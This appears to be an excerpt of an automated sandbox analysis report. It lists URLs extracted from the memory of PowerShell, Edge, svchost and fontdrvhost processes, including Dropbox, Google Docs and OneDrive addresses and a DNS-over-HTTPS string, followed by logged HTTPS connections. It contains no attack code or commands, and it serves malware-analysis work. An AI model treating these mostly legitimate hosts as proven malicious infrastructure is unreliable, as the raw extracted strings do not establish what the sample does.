Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://app.hellosign.com/
Source: msedge.exe, 00000005.00000002.2232022623.00000241492A5000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2409707632.00000221846AA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.com
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://canny.io/sdk.js
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                    Source: msedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: msedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: msedge.exe, 00000005.00000002.2232668987.00003C1000024000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2411623205.00001C4C00040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: fontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                    Source: fontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                    Source: svchost.exe, 00000006.00000003.2227435676.0000018A79233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000006.00000003.2227435676.0000018A791C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                    Source: msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                    Source: unknown HTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49773 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49811 version: TLS 1.2
